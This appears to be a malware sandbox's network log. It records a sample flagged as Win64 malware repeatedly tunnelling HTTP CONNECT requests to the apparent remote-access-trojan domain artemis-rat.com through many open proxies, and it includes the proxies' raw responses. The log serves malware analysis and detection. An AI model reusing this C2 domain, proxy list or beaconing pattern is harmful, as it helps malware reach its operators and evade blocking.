                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.258995056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1088192.168.2.45335895.66.138.2188807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.983072996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.799468040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1089192.168.2.453335223.112.53.210257284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.986387014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.197621107 CET65INHTTP/1.1 200 Connection established
                                              Proxy-Agent: gost/2.11.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1090192.168.2.453492104.20.123.164807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.987032890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.141571045 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1091192.168.2.453496104.20.235.179807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.989087105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.144351006 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1092192.168.2.453502172.67.182.85807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.990885973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.146826029 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1093192.168.2.453490164.92.86.113573917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.004009008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.553937912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.163475990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.292238951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.460777998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.663440943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.866508007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.248452902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.960196972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1094192.168.2.453405222.220.102.15980007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.006934881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.673273087 CET59INHTTP/1.1 200 Connection Established
                                              Proxy-agent: nginx


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1095192.168.2.45340858.234.116.19781977284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.011085033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1096192.168.2.4533793.108.115.4810807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.027017117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.419630051 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1097192.168.2.453389119.18.149.3480807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.030735016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1098192.168.2.452627162.159.247.92807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.030960083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.193192959 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1099192.168.2.453649152.32.132.224437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.034781933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1100192.168.2.453658152.32.132.224437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.038162947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1101192.168.2.453662152.32.132.224437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.039872885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1102192.168.2.453667152.32.132.224437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.041245937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1103192.168.2.451286103.48.68.101837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.045387983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.069536924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.163377047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1104192.168.2.45342127.96.235.171807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.046386957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1105192.168.2.45341147.243.114.19281807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.133230925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1106192.168.2.45138145.159.189.24431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.133964062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.131620884 CET536INHTTP/1.1 503 Service Unavailable
                                              Server: squid/3.5.20
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3830
                                              X-Squid-Error: ERR_DNS_FAIL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1107192.168.2.451398123.110.158.236807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.134294987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1108192.168.2.45126937.187.77.58598707284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.135118961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1109192.168.2.453535104.21.194.182807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.139693975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.294317961 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1110192.168.2.45342445.82.15.1188887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.147520065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:05.315697908 CET70INHTTP/1.0 200 Connection established
                                              Proxy-agent: tinyproxy/1.11.0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1111192.168.2.453440139.224.64.19180817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.147521973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.475454092 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
